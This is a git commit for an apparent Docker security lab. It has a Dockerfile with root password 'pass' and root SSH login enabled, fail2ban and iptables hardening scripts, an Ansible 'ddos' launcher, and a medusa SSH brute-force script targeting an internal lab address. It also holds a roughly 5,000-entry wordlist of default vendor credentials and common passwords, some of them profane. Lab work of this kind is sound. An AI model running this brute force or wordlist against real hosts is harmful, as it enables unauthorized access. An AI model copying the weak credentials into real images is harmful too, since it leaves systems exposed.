commit 7c50890c4ef87408f6fd24e51ba8314a4608d0f0 Author: Zoiros13 Date: Sat Jan 23 11:11:29 2021 +0200 Commit message diff --git a/.vimrc b/.vimrc new file mode 100755 index 0000000..7a2858b --- /dev/null +++ b/.vimrc @@ -0,0 +1,15 @@ +map :NERDTreeToggle + +autocmd BufNewFile,BufRead *.vue,*.js set syntax=verilog tabstop=2|set shiftwidth=2|set noexpandtab autoindent +augroup remember_folds + autocmd! + autocmd BufWinLeave * mkview + autocmd BufWinEnter * silent! loadview +augroup END +" Useful for my Quick Notes feature in my tmuxrc +augroup QuickNotes + au BufWrite,VimLeave NOTES.otl mkview + au BufRead NOTES.otl silent loadview +augroup END +set swapfile +set dir=~/tmp diff --git a/Dockerfile b/Dockerfile new file mode 100755 index 0000000..0c8f579 --- /dev/null +++ b/Dockerfile @@ -0,0 +1,33 @@ +FROM localhost:5000/sec +# +USER root +RUN export DEBIAN_FRONTEND=noninteractive && apt-get update && apt-get --no-install-recommends install -y openssh-server net-tools curl tcpdump shorewall sudo vim nmap dnsutils iputils-ping iptables wget python +RUN apt-get autoremove --purge && apt clean +RUN rm -rf /var/lib/apt/lists/* +RUN mkdir -p /var/run/sshd +RUN echo 'root:pass' | chpasswd +RUN sed -i 's/PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config +# +# SSH login fix. Otherwise user is kicked off after login +RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd +# +ENV NOTVISIBLE "in users profile" +RUN echo "export VISIBLE=now" >> /etc/profile +#RUN wget -k https://raw.githubusercontent.com/egalpin/apt-vim/master/install.sh +# +# +# +COPY sec_bootstrap /usr/bin +COPY get_hosts /usr/bin +COPY auto_update_hosts /usr/bin +RUN mkdir -p /etc/shorewall +COPY shorewall /etc/shorewall +RUN mkdir -p /etc/opt +RUN mkdir -p /project +WORKDIR /project +COPY install-vim-plugin.sh . +#RUN bash ./install-vim-plugin.sh +#RUN apt-vim install -y https://github.com/scrooloose/nerdtree.git +RUN grep -qw ^docker /etc/passwd || useradd -m docker && echo "docker:docker" | chpasswd && adduser docker sudo +COPY .vimrc /home/docker +USER docker diff --git a/ROOT_PASSWORD b/ROOT_PASSWORD new file mode 100755 index 0000000..7f3a2ef --- /dev/null +++ b/ROOT_PASSWORD @@ -0,0 +1 @@ +ROOT_PASSWORD="pass" diff --git a/auto_update_hosts b/auto_update_hosts new file mode 100755 index 0000000..53c8abe --- /dev/null +++ b/auto_update_hosts @@ -0,0 +1,11 @@ +#!/bin/sh + +hosts=$(get_hosts) +printf "%s" "$hosts" > "$1" + +while sleep 2 +do + current_hosts=$(get_hosts) + [ "$hosts" != "$current_hosts" ] && printf "%s" "$current_hosts" > "$1" + hosts=$current_hosts +done diff --git a/backup_files/ansible_cfg_text b/backup_files/ansible_cfg_text new file mode 100644 index 0000000..c99ba69 --- /dev/null +++ b/backup_files/ansible_cfg_text @@ -0,0 +1,35 @@ +# config file for ansible -- https://ansible.com/ +# =============================================== + +# nearly all parameters can be overridden in ansible-playbook +# or with command line flags. ansible will read ANSIBLE_CONFIG, +# ansible.cfg in the current working directory, .ansible.cfg in +# the home directory or /etc/ansible/ansible.cfg, whichever it +# finds first + +[defaults] +host_key_checking = False + +# some basic default values... + +#inventory = /etc/ansible/hosts +#library = /usr/share/my_modules/ +#module_utils = /usr/share/my_module_utils/ +#remote_tmp = ~/.ansible/tmp +#local_tmp = ~/.ansible/tmp +#plugin_filters_cfg = /etc/ansible/plugin_filters.yml +#forks = 5 +#poll_interval = 15 +#sudo_user = root +#ask_sudo_pass = True +#ask_pass = True +#transport = smart +#remote_port = 22 +#module_lang = C +#module_set_locale = False + +# plays will gather facts by default, which contain information about +# the remote system. +# +# smart - gather by default, but don't regather if already gathered + diff --git a/backup_files/ddos_atck_script.sh b/backup_files/ddos_atck_script.sh new file mode 100755 index 0000000..9867bae --- /dev/null +++ b/backup_files/ddos_atck_script.sh @@ -0,0 +1,2 @@ +ansible-playbook -u docker -i inventory_w.yml test3.yml -f 4 --ask-pass --ask-become-pass + diff --git a/backup_files/fail2ban_script.sh b/backup_files/fail2ban_script.sh new file mode 100755 index 0000000..3c9b2fc --- /dev/null +++ b/backup_files/fail2ban_script.sh @@ -0,0 +1,28 @@ +#!/bin/sh + + +sudo apt-get update -y # To get the latest package lists +sudo apt install rsyslog #instal auth.log +sudo service rsyslog start #start syslog +#grep "Failed password" /var/log/auth.log #check for login failures +#grep "Failed password" /var/log/auth.log | awk ‘{print $11}’ | uniq -c | sort +sudo cat /var/log/auth.log | grep "Failed password" +sudo apt install fail2ban -y +sudo service fail2ban enable +sudo service fail2ban start +sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local +sudo sed -i '244d' /etc/fail2ban/jail.local +sudo sed -i '239 a enabled = true' /etc/fail2ban/jail.local +sudo sed -i '240 a maxretry = 3' /etc/fail2ban/jail.local +sudo sed -i '241 a bantime = 300' /etc/fail2ban/jail.local +sudo sed -i '242 a findtime = 30' /etc/fail2ban/jail.local +sudo sed -i '243 a chain = INPUT' /etc/fail2ban/jail.local +sudo sed -i '244 a port = 22' /etc/fail2ban/jail.local +sudo sed -i '245 a action_ = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]' /etc/fail2ban/jail.local +sudo service fail2ban restart +sudo fail2ban-client status sshd +sudo iptables -L + + + + diff --git a/backup_files/first_script.sh b/backup_files/first_script.sh new file mode 100755 index 0000000..74b329a --- /dev/null +++ b/backup_files/first_script.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +#nmap -n -sn 172.25.0.* -oG - | awk '/Up$/{print $2}' + +sudo apt-get update -y # To get the latest package lists +sudo apt install ansible -y +sudo apt install sshpass -y +sudo sed -i "11i host_key_checking = False" /etc/ansible/ansible.cfg +ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass +#sudo tcpdump -i eth0 +#now interrupt the process. get its PID: +#pid=$(ps -e | pgrep tcpdump) +#echo $pid +# +#interrupt it: +#sleep 5 +#kill -2 $pid + + diff --git a/backup_files/hello_world.sh b/backup_files/hello_world.sh new file mode 100755 index 0000000..b5b6a5a --- /dev/null +++ b/backup_files/hello_world.sh @@ -0,0 +1 @@ +echo "Hello World" diff --git a/backup_files/inventory.yml b/backup_files/inventory.yml new file mode 100644 index 0000000..6aabedc --- /dev/null +++ b/backup_files/inventory.yml @@ -0,0 +1,6 @@ +[service] +172.21.0.2 +172.21.0.3 +172.21.0.4 +172.21.0.5 +172.21.0.6 diff --git a/backup_files/inventory_w.yml b/backup_files/inventory_w.yml new file mode 100644 index 0000000..efd3e61 --- /dev/null +++ b/backup_files/inventory_w.yml @@ -0,0 +1,5 @@ +[service] +172.21.0.3 +172.21.0.4 +172.21.0.5 +172.21.0.6 diff --git a/backup_files/iptables_rules.sh b/backup_files/iptables_rules.sh new file mode 100755 index 0000000..f8f688c --- /dev/null +++ b/backup_files/iptables_rules.sh @@ -0,0 +1,54 @@ +#!/bin/sh + +### 1: Drop invalid packets +#iptables -t mangle -A PREROUTING -m conntrack --ctstate INVALID -j DROP + +### 2: Drop TCP packets that are new and are not SYN ### +#iptables -t mangle -A PREROUTING -p tcp ! --syn -m conntrack --ctstate NEW -j DROP + +### 3: Drop SYN packets with suspicious MSS value ### +#iptables -t mangle -A PREROUTING -p tcp -m conntrack --ctstate NEW -m tcpmss ! --mss 536:65535 -j DROP + +### 4: Block packets with bogus TCP flags ### +#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN FIN,SYN -j DROP +#iptables -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j DROP +#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,RST FIN,RST -j DROP +#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,ACK FIN -j DROP +#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,URG URG -j DROP +#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,PSH PSH -j DROP +#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j DROP + +### 5: Block spoofed packets ### +#iptables -t mangle -A PREROUTING -s 224.0.0.0/3 -j DROP +#iptables -t mangle -A PREROUTING -s 169.254.0.0/16 -j DROP +#iptables -t mangle -A PREROUTING -s 172.16.0.0/12 -j DROP +#iptables -t mangle -A PREROUTING -s 192.0.2.0/24 -j DROP +#iptables -t mangle -A PREROUTING -s 192.168.0.0/16 -j DROP +#iptables -t mangle -A PREROUTING -s 10.0.0.0/8 -j DROP +#iptables -t mangle -A PREROUTING -s 0.0.0.0/8 -j DROP +#iptables -t mangle -A PREROUTING -s 240.0.0.0/5 -j DROP +#iptables -t mangle -A PREROUTING -s 127.0.0.0/8 ! -i lo -j DROP + +### 7: Drop fragments in all chains ### +#iptables -t mangle -A PREROUTING -f -j DROP + +### 8: Limit connections per source IP ### +iptables -A INPUT -p tcp -m connlimit --connlimit-above 111 -j REJECT --reject-with tcp-reset + +### 9: Limit RST packets ### +iptables -A INPUT -p tcp --tcp-flags RST RST -m limit --limit 2/s --limit-burst 2 -j ACCEPT +iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP + + +### 10: Limit new TCP connections per second per source IP ### +iptables -A INPUT -p tcp -m conntrack --ctstate NEW -m limit --limit 60/s --limit-burst 20 -j ACCEPT +iptables -A INPUT -p tcp -m conntrack --ctstate NEW -j DROP + +### 11:SYNPROXY +#iptables -t raw -A PREROUTING -p tcp -m tcp --syn -j CT --notrack +#iptables -A INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460 +#iptables -A INPUT -m conntrack --ctstate INVALID -j DROP + +### SSH brute-force protection ### +#iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --set#iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --update --seconds 60 --hitcount 10 -j DROP + diff --git a/backup_files/medusa_script.sh b/backup_files/medusa_script.sh new file mode 100755 index 0000000..4dceab8 --- /dev/null +++ b/backup_files/medusa_script.sh @@ -0,0 +1,10 @@ +#!/bin/sh + + +sudo apt-get update -y # To get the latest package lists +sudo apt install medusa -y +cp /project/passwd_list.txt . +medusa -h 172.21.0.4 -u docker -P ./passwd_list.txt -M ssh -f -v 6 + + + diff --git a/backup_files/passwd_list.txt b/backup_files/passwd_list.txt new file mode 100644 index 0000000..a62570b --- /dev/null +++ b/backup_files/passwd_list.txt @@ -0,0 +1,5276 @@ +d[^_^] +* +0 +00 +000 +0000 +00000 +000000 +0000000 +00000000 +06071992 +09090 +0P3N +docker +0RACLE +0RACLE38 +0RACLE39 +0RACLE8 +0RACLE8I +0RACLE9 +0th +1 +1000 +100198 +10023 +1064 +11 +111 +1111 +11111 +111111 +1111111 +11111111 +11223344 +12 +123 +123123 +1234 +12341 +12341234 +12345 +123454 +123456 +1234567 +12345678 +1234567890 +1234admin +123qwe +127.0.0.1 +12871 +1322222 +14admin +1502 +166816 +18140815 +19750407 +1988 +19920706 +1RRWTTOOI +2 +21241036 +2222 +22222 +22222222 +22332323 +234 +23646 +240653C9467E45 +24343 +24Banc81 +2501 +256256 +2580 +266344 +2800 +29111991 +2WSXcde +2WSXcder +3 +3098z +31994 +3333 +33333333 +3477 +3ascotel +3com +3Com +3comcso +3ep5w2u +*3noguru +3ware +4 +40793 +4133 +4321 +4444 +44444 +44444444 +456 +4Dgifts +4getme2 +4tas +4tugboat +5 +5555 +55555555 +5678 +56789 +5777364 +57gbzb +589589 +5897 +589721 +5X2000 +6 +60020 +6071992 +657 +6666 +666666 +66666666 +7 +7061992 +727 +744 +75780432 +7654321 +7772000 +7777 +77777777 +7936 +8 +8111 +8429 +8888 +88888888 +8RttoTriz +9 +9999 +99999999 +a +A52896nG93096a +aa +aaa +AaBbCcDd +aammii +abc123 +ABCD +abd234 +acc +access +Access +ACCESS +ACCORD +accounting +acer +adaptec +adb234 +adfexc +ADLDEMO +adm +admin +!admin +Admin +ADMIN +admin00 +admin000 +admin1 +admin_1 +Admin1 +admin123 +admin1234 +admin2 +ADMIN (23646) +admin256 +Admin5 +adminadmin +Administrative +administrator +Administrator +ADMINISTRATOR +adminpass +adminpwd +adminstat +adminstrator +adminttd +adminuser +adminview +admn +ADMN +admpw +ADSL +adsl1234 +adslolitec +adslroot +adtran +ADTRAN +Advance +advcomm500349 +ADVMAIL +ahetzip8 +Airaya +AIROPLANE +AitbISP4eCiG +alfarome +alien +ALLIN1 +ALLIN1MAIL +ALLINONE +allot +aLLy +Alphanetworks +AlpheusDigital1010 +alpine +AM +amber +ami +AMI +A.M.I +AMI~ +AMIAMI +AMIDECOD +amigosw1 +AMI.KEY +AMI.KEZ +amipswd +AMIPSWD +AMISETUP +AMI_SW +AMI!SW +AMI?SW +anicust +anon +anonymous +Anonymous +ANS#150 +any +any@ +Any +ANYCOM +AP +aPAf +aparker +apc +APC +application +APPLSYS +APPS +APPS_MRC +APPUSER +AQ +AQDEMO +AQJAVA +AQUSER +AR#Admin# +ARCHIVIST +articon +asante +Asante +ascend +Ascend +asd +asd123 +asecret +at4400 +atc123 +atc456 +atlantis +attack +AUDIOUSER +author +autocad +AUTORAID +award +?award +award_? +Award +AWARD +award_ps +AWARD_PW +award.sw +AWARD_SW +AWARD?SW +awkward +ax400 +axis2 +b +babbit +Babylon +backdoor +BACKUP +backuponly1 +backuprestore1 +BackupU$r +badg3r5 +bagabu +barney +barricade +Barricade +BASE +basisk +BATCH +bbs +BC4J +bciim +bciimpw +bcim +bcimpw +bcms +bcmspw +bcnas +bcnaspw +bell9 +bewan +BIGO +bill +bin +bintec +biodata +bios +BIOS +BIOSPASS +biosstar +biostar +Biostar +blablabla +blender +blue +bluepw +boca +boss +bpel +BRIDGE +brightmail +BRIO_ADMIN +broadband +brocade1 +browse +browsepw +bsxpass +builtin +c +cablecom +cable-docsis +Cable-docsis +cacadmin +cac_admin +calvin +CAROLIAN +cascade +CATALOG +cc +CCC +cclfb +ccrusr +CDEMO82 +CDEMOCOR +CDEMORID +CDEMOUCB +cellit +CENTRA +central +CENTUM +cgadmin +chain +changeit +changeme +changeme! +changeme2 +changeonfirstlogin +change_on_install +CHANGE_ON_INSTALL +changethis +checkfs +checkfsys +checksys +CHEY_ARCHSVR +ChgMeNOW +$chwarzepumpe +CIDS +CIS +cisco +Cisco +_Cisco +cisco123 +CISCO15 +ciscofw +Cisco router +ciscovpn +CISINFO +CISSUS +citel +ciwuxe +CLERK +client +CLOTH +cmaker +CMOSPWD +cms500 +CMSBATCH +CNAS +COGNOS +col1ma +Col2ogro2 +comcast +comcomcom +COMPANY +Compaq +COMPIERE +Compleri +CONCAT +condo +CONDO +conexant +Config +CONFIG (266344) +Congress +connect +console +control +CONV +converge +corecess +correct +cr0wmt 911 +craft +craftpw +Craftr4 +crash +crftpw +Crystal +CSG +CSMIG +CTX_123 +CTXDEMO +CTXSYS +cusadmin +cust +customer +custpw +d +d1scovery +dadmin +dadmin01 +daemon +Daewuu +damin +danger +davox +Daytec +db2admin +db2fenc1 +db2inst1 +dbase +DBDCCIC +dbpass +dbps +DBSNMP +DCL +debug +d.e.b.u.g +DECMAIL +DECNET +default +DEFAULT +default.password +Dell +deltav +demo +DEMO +DEMO8 +DEMO9 +demos +DES +deskalt +deskman +desknorm +deskres +detmond +dev +DEV2000_DEMOS +device +dhs3mt +dhs3pms +diag +diamond +DIGITAL +DIP +DISC +DISCOVERER_ADMIN +distrib0 +disttech +djonet +D-Link +dmr99 +dn_04rjc +dni +dnnadmin +dnnhost +dos +docker +dottie +draadloos +draytek +DSGATEWAY +DSL +@dsl_xilno +DSSYS +D_SYSPW +D_SYSTPW +DTA +ducati900ss +DV5800 +dvr2580222 +dvst10n +e250 +e250changeme +e500 +e500changeme +eagle +echo +efmukl +EJSADMIN +Ektron +Emerson1 +EMP +enable +eng +engineer +engmode +enhydra +enquiry +enquirypw +enter +eomjbOBLLwbZeiKV +epicrouter +equalizer +ergc +ESSEX +ESTORE +etas +EVENT +Everything +Exabyte +EXFSYS +exinda +expert +expert03 +Expert03 +extendnet +Fact4EMC +factory +Factory +fal +fam +familymacintosh +fax +FAX +FAXUSER +FAXWORKS +fibranne +field +FIELD +FIELD.SUPPORT +Fiery.1 +FINANCE +Fireport +firstsite +fivranne +FND +FNDPUB +FOOBAR +foolproof +FORCE +FORSE +friend +ftp +ftp_admi +ftp_inst +ftp_nmc +ftp_oper +funkwerk +funwerk +fw +g6PJ +games +gandalf +ganteng +Gateway +GATEWAY +Geardog +Gearguy +gen1 +GEN1 +gen2 +GEN2 +ggdaseuaimhrke +GL +glftpd +GlobalAdmin +gniffe +gnumpf +gopher +GPFD +GPLD +guardone +gubed +guest +Guest +GUEST +guest1 +guestgue +GUESTGUE +GUESTGUEST +guru +gvt12345 +GWrv +h179350 +h6BB +hagpolm1 +halt +HARRIS +hawk201 +HCPARK +hdms +HELGA-S +hello +HELLO +help +HELP +help1954 +helpdesk +Helpdesk +HELPDESK +HEWITT +HEWITT RAND +hewlpack +highspeed +Highspeed +HighSpeed +HLT +HLW +honey +HOST +hp +HP +hp.com +HPDESK +HPLASER +HPOFFICE +HPOFFICE DATA +HPONLY +HPP187 +HPP187 SYS +HPP189 +HPP196 +hpt +HPWORD +HPWORD PUB +hqadmin +HR +hs7mwxkk +hsa +hsadb +hscroot +http +HTTP +hydrasna +ibm +IBM +ibmcel +iclock +iDirect +ILMI +ilom-admin +ilom-operator +ilon +ImageFolio +images +IMAGEUSER +IMEDIA +imsa7.0 +imss7.0 +inads +indspw +INFO +informix +infrant1 +INGRES +init +initpw +install +installer +INSTANCE +intel +Intel +intermec +IntraStack +IntraSwitch +INTX3 +inuvik49 +INVALID +ioFTPD +iolan +IP +ip20 +ip21 +ip3000 +ip305Beheer +ip400 +ironport +iscopy +isdev +isee +IS_$hostname +!ishtar +isolation +isp +ISPMODE +ITF3000 +iwill +j09F +j256 +j262 +j322 +j5Brn9 +j64 +jagadmin +james +jamfsw03 +Janitza +jannie +janta211 +jasperadmin +jboss4 +JDE +jdoe +JETSPEED +JMUSER +joeuser +joh316 +jstwo +juniper123 +kahn +Keep +kermit +KEYSCAN +kilo1987 +kn1TG7psLu +kodi +komprie +kronites +ksdjfg934t +l +l1 +l2 +L2LDEMO +l3 +laflaf +#l@$ak#.lk;0@P +lantronix +LASER +LASERWRITER +last +LBACSYS +LdapPassword_1 +leaves +lesarotl +letacia +letacla +letmein +leviton +Liebert +lineprin +linga +LINK +live +lkw +lkwpeter +lkw peter +LKWPETER +llatsni +Local +locate +locatepw +logapp +login +logon +look +looker +LOTUS +lp +lpadm +lpadmin +LRISDN +LR-ISDN +LUCENT01 +LUCENT02 +lucenttech1 +lucenttech2 +lucy99 +Lund +lynx +m +m1122 +m1link +mac +MagiMFP +mail +MAIL +MAILER +maint +MAINT +maintain +maintaince +maintainer +maintpw +man +MANAG3R +manage +!manage +manager +Manager +MANAGER +managers +MANAGER.SYS +manuf +marketing +master +Master +MASTER +masterkey +Mau?dib +Mau'dib +Mau’dib +MBIU0 +MBMANAGER +MBWATCH +mcp +MCUrv +MCUser1 +MD110 +MDaemon +MDDEMO +MDSYS +me +mediator +medion +meinsm +Menara +mercury +merlin +mfd +MFG +MGR +MGR.SYS +MGWUSER +michelangelo +Michelangelo +MICHELANGELO +MICRO +microbusiness +Microbusiness +MIGRATE +MILLER +miniap +miniAP +MiniAP +ml1100 +ml1400 +mlusr +mMmM +MMO2 +mnet +monitor +mono +MOREAU +motorola +mountfs +mountfsys +mountsys +mozart +mp3mystic +MPE +mpegvideo +@mprs643 +MServer +MSHOME +mso +mtch +mtcl +MTRPW +MTS_PASSWORD +MTSSYS +MTYSYS +mu +mU +Mu +MU +Mua'dib +Multi +MUMBLEFRATZ +Muse!Admin +Musi%1921 +Musii%1921 +muze +MuZhlo9n%8!G +MXAGENT +my_DEMARC +mydlp +mysecretpassword0* +mysweex +n/a +naadmin +NAMES +NAU +ncadmin +ncrm +(nessun) +netadmin +NETBASE +netbotz +NetCache +NETCON +NETFRAME +netgear1 +NetICs +netlink +netman +NETMGR +NETNONPRIV +NETOP +netopia +netops +NETOulu +NETPRIV +netrangr +netscreen +NetSeq +NetServer +NETSERVER +NetSurvibox +NetVCR +NETWORK +NEWINGRES +news +NEWS +NeXT +NF +NFI +nicecti +nician +NICONEX +@*nigU^D.ha +nimda +nimdaten +nm2user +nms +nmspw +no +No +nobody +NOC +nokai +nokia +none +NONPRIV +nopasswd +nortel +novell +noway +nsa +nsi +nsroot +ntacdmax +NTCIP +ntpupdate +NULL +nz0u4bbe +OAS_PUBLIC +OCITEST +OCS +ODM +ods +ODS +ODSCOMMON +OE +OEMADM +OEMREP +oem_temp +OEM_TEMP +OkiLAN +OLAPDBA +OO +OOOOOOOO +op +OPENSPIRIT +Oper +OPER +OPERATIONS +OPERATNS +operator +Operator +OPERATOR +OPERVAX +OP.OPERATOR +ORACL3 +oracle +ORACLE +ORACLE8 +ORACLE8I +ORACLE9 +ORAREGSYS +ORASSO +ORDPLUGINS +ORDSYS +orinoco +orion99 +osmc +OSP22 +otbu+1 +OUTLN +overseer +OWA +OWA_PUBLIC +OWNER +p1nacate +P@55w0rd! +pamadmin +PANAMA +PAPER +par0t +Partner +pass +PASS +passw0rd +Passw0rd +PASSW0RD +passwd +password +Password +PASSWORD +password1 +passwort +Passw@rd +patrol +PATROL +pa$$word +PBX +pbxk1064 +PCUSER +PDP11 +PDP8 +pento +Pento +pepino +perfectpraise +PERFSTAT +peribit +permit +Pete +PFCUser +pfsense +phplist +phpreactor +pilou +piranha +pixadmin +pixmet2003 +PLEX +PlsChgMe +PlsChgMe! +PM +pmd +pnadmin +PO +PO7 +PO8 +poll +Polrty +Polycom +PORTAL30 +PORTAL30_DEMO +PORTAL30_PUBLIC +PORTAL30_SSO +PORTAL30_SSO_PS +PORTAL30_SSO_PUBLIC +PORTAL31 +POST +Posterie +postmast +POSTMASTER +powerapp +POWERCARTUSER +powerdown +powervault +PRIMARY +prime +primenet +primeos +primos +PRINT +PRINTER +PRIV +private +PRODCICS +PRODDTA +PROG +prost +protection +Protector +prtgadmin +PSEAdmin +PUB +public +Public +public/private/secret +publish +PUBSUB +PUBSUB1 +pw +P@$$W0RD +pwp +pwpw +pwrchute +q +Q +Q54arwms +QDBA +QDI +QNX +qpgmr +QS +QS_ADM +QS_CB +QS_CBADM +QS_CS +qsecofr +QSECOFR +qserv +QS_ES +QS_OS +qsrv +QSRV +qsrvbas +QSRVBAS +qsvr +QS_WS +qsysopr +questra +quser +QUSER +qwerty +R1QTPS +radius +radware +raidzone +rainbow +(random +rapport +raritan +raspberry +RAV +rcust +rcustpw +rdc123 +RE +readonly +ReadOnly +readwrite +ReadWrite +recover +recovery +redips +redline +REGO +REMOTE +REPADMIN +repair +replication-receiver +replicator +REPORT +REP_OWNER +restoreonly1 +resumix +$rfmngr$ +RIP000 +riverhead +rje +RJE +rkwjsdusrnth +RM +RMAIL +RMAN +rmnetlm +RMUser1 +ro +ROBELLE +rodopi +Rodopi +role1 +root +!root +Root +ROOT +ROOT500 +rootadmin +rootme +rootpass +route +router +r@p8p0r+ +RSAAppliance +rsadmin +RSBCMON +RSX +rw +rwa +rwmaint +sa +SABRE +sales +s!a@m#n$p%c +SAMPLE +sanfran +san fran 8 +SAP +sap123 +SAPR3 +sasasa +scmadmin +scmchangeme +scout +SDGROCKS +SDOS_ICSAP +secacm +SECDEMO +secoff +secofr +SECONDARY +secret +SECRET123 +secur4u +secure +$secure$ +security +SECURITY +SENTINEL +SER +serial# +Serial +Serialnumber +Serial Number +sertafu +Serv4EMC +service +Service +SERVICE +SERVICECONSUMER1 +SESAME +setup +setup/nopasswd +SH +Sharp +SHELVES +shiva +shs +shutdown +signa +singh +siteadmin +sitecom +Sitecom +SITEMINDER +SKY_FOX +sl33p30F00dumass! +sldkj754 +SLIDEPW +sma +smallbusiness +smc +smcadmin +Smcadmin +SMDR +smile +snake +snmp +snmp-Trap +SNOWMAN +SnuFG5 +software +software01 +sp99dd +Spacve +spcl +specialist +speedxess +SpIp +SPOOLMAN +spooml +SQL +$SRV +SSA +ssadmin +ssladmin +ssp +star +STARTER +STEEL +storageserver +store +storwatch +stratacom +stratauser +STRAT_PASSWD +STUDENT +su +sudo +Sudo +sun123 +super +Super +SUPER +superadmin +superman +superpass +SUPERSECRET +superuser +SUPERUSER +supervisor +SUPERVISOR +support +Support +SUPPORT +supportpw +su@psir +surecom +surt +svcPASS83 +SW_AWARD +switch +SWITCH +SWITCHES_SW +swordfish +SWORDFISH +SWPRO +SWUSER +sx2000 +Sxyz +symantec +SY_MB +symbol +Symbol +SYMPA +sync +synnet +sys +SYS +SYS1 +SYSA +sysadm +SYSADM +sysadmin +sysAdmin +Sysadmin +sysadmpw +sysbin +sys/change_on_install +SYSDBA +syslib +SYSLIB +SYSMAINT +SYSMAN +Sysop +sysopr +SYSPASS +syspw +system +System +SYSTEM +system_admin +SYSTEST +SYSTEST_CLIG +SZYX +t00lk1t +t0ch20x +t0ch88 +t0talc0ntr0l4! +TAHITI +talent +TANDBERG +target +tasmannet +Tasmannet +tatercounter2000 +TCH +TDOS_ICSAP +teacher +tech +technician +technolgi +techsupport +tegile +telco +tele +telecom +Telecom +TELEDEMO +TELESUP +tellabs +tellabs#1 +telmex +telos +telus00 +telus99 +temp1 +TENmanUFactOryPOWER +test +TEST +TESTPILOT +tetra +teX1 +themaster01 +the same all over +tiabuena +tiara +tiaranet +tiger +Tiger +TIGER +tiger123 +timely +tini +tiny +Tiny +tivonpw +TJM +tlah +TOAD +tomcat +toor +tooridu +topicalt +topicnorm +topicres +toplayer +Toshiba +toshy99 +touch +touchpwd= +tour +tr650 +TRACE +tracell +trade +trancell +TRAVEL +trendimsa1.0 +Trintech +TrippLite +trmcnfg +trocse +trouble +truetime +TSDEV +TSEUG +tslinux +tsunami +TSUSER +TTPTHA +TURBINE +tutor +tuxalize +TzqF +uboot +ucenik +uClinux +UETP +UI-PSWD-01 +UI-PSWD-02 +ULTIMATE +umountfs +umountfsys +umountsys +Unidesk1 +unix +UNKNOWN +uplink +uploader +urchin +use +user +User +USER +USER0 +user0000 +USER1 +USER2 +USER3 +USER4 +USER5 +user5710 +USER6 +USER7 +USER8 +USER9 +USERID +userNotU +USERP +USER_TEMPLATE +UTLESTAT +utstar +uucp +uucpadm +VAX +vcr +VCSRV +vertex25 +VESOFT +Vextrex +vgnadmin +VIDEO +viewuser1 +VIF_DEV_PWD +VIRUSER +vision2 +visor +visual +VMS +VNC +volition +vpasp +VRR1 +vt100 +VTAM +vty +w0rkplac3rul3s +w2402 +waav +wago +wampp +WANGTEK +wavespan +web +webadmin +WebBoard +WEBCAL01 +webdb +WEBDB +webibm +weblogic +webmaster +WEBREAD +websecadm +webshieldchangeme +welcome +WELCOME +westermo +wg +whd +winccpass +WINDOWS_PASSTHRU +WINSABRE +winterm +Wireless +WKSYS +WLAN_AP +wlcsystem +wlpisystem +wlse +wlsedb +wlsepassword +wlseuser +wodj +Wonderware +WOOD +WORD +WP +wpsadmin +wradmin +wrgg15_di524 +write +www +WWW +WWWUSER +wyse +X#1833 +x40rocks +x6zynd56 +x-admin +xbox +xceladmin +xd +xdfk9874t3 +xljlbj +XLSERVER +xmux +xo11nE +XPRT +xxyyzz +xyzall +xyzzy +year2000 +YES +yZgO8Bvj +ZAAADA +zbaaaca +zebra +Zenith +zeosx +zjaaadc +zoomadsl +zxdsl +ZXDSL +123456 +password +12345678 +1234 +pussy +12345 +dragon +qwerty +696969 +mustang +letmein +baseball +master +michael +football +shadow +monkey +abc123 +pass +fuckme +6969 +jordan +harley +ranger +iwantu +jennifer +hunter +fuck +2000 +test +batman +trustno1 +thomas +tigger +robert +access +love +buster +1234567 +soccer +hockey +killer +george +sexy +andrew +charlie +superman +asshole +fuckyou +dallas +jessica +panties +pepper +1111 +austin +william +daniel +golfer +summer +heather +hammer +yankees +joshua +maggie +biteme +enter +ashley +thunder +cowboy +silver +richard +fucker +orange +merlin +michelle +corvette +bigdog +cheese +matthew +121212 +patrick +martin +freedom +ginger +blowjob +nicole +sparky +yellow +camaro +secret +dick +falcon +taylor +111111 +131313 +123123 +bitch +hello +scooter +please +porsche +guitar +chelsea +black +diamond +nascar +jackson +cameron +654321 +computer +amanda +wizard +xxxxxxxx +money +phoenix +mickey +bailey +knight +iceman +tigers +purple +andrea +horny +dakota +aaaaaa +player +sunshine +morgan +starwars +boomer +cowboys +edward +charles +girls +booboo +coffee +xxxxxx +bulldog +ncc1701 +rabbit +peanut +john +johnny +gandalf +spanky +winter +brandy +compaq +carlos +tennis +james +mike +brandon +fender +anthony +blowme +ferrari +cookie +chicken +maverick +chicago +joseph +diablo +sexsex +hardcore +666666 +willie +welcome +chris +panther +yamaha +justin +banana +driver +marine +angels +fishing +david +maddog +hooters +wilson +butthead +dennis +fucking +captain +bigdick +chester +smokey +xavier +steven +viking +snoopy +blue +eagles +winner +samantha +house +miller +flower +jack +firebird +butter +united +turtle +steelers +tiffany +zxcvbn +tomcat +golf +bond007 +bear +tiger +doctor +gateway +gators +angel +junior +thx1138 +porno +badboy +debbie +spider +melissa +booger +1212 +flyers +fish +porn +matrix +teens +scooby +jason +walter +cumshot +boston +braves +yankee +lover +barney +victor +tucker +princess +mercedes +5150 +doggie +zzzzzz +gunner +horney +bubba +2112 +fred +johnson +xxxxx +tits +member +boobs +donald +bigdaddy +bronco +penis +voyager +rangers +birdie +trouble +white +topgun +bigtits +bitches +green +super +qazwsx +magic +lakers +rachel 